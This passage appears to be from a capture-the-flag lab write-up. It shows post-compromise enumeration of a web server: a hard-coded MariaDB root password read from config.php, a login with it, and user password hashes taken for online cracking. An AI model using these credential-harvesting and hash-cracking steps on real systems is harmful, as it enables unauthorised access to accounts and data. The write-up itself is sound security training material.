MySQL
There is an internal MySQL instance running on the target port 3306
bash-4.2$ pwd
/var/www/html/rms
bash-4.2$ cd connection ; ll
total 8.0K
0 drwxr-xr-x. 2 root root 24 Jul 26 2021 .
4.0K drwxr-xr-x. 10 root root 4.0K Jul 26 2021 ..
4.0K -rw-r--r--. 1 root root 239 Jul 26 2021 config.php
bash-4.2$ cat config.php
<?php
define('DB_HOST', 'localhost');
define('DB_USER', 'root');
define('DB_PASSWORD', 'veerUffIrangUfcubyig');
define('DB_DATABASE', 'dbrms');
define('APP_NAME', 'Pathfinder Hotel');
error_reporting(1);
?>The DB credential is hard-coded to the connection/config.php file; root:veerUffIrangUfcubyig
This was also picked up by PEAS
MariaDB
bash-4.2$ mysql -uroot -pveerUffIrangUfcubyig
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 3289
Server version: 5.5.68-MariaDB MariaDB Server
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]>
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dbrms |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.02 sec)
MariaDB [(none)]> use dbrms
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changedSuccessfully authenticated
Selecting the dbrms database
I will grab the user credential hashes
Password Cracking
crackstation.net cracked the password hashes, except for the one belongs to the edward user
This appears to be a deadend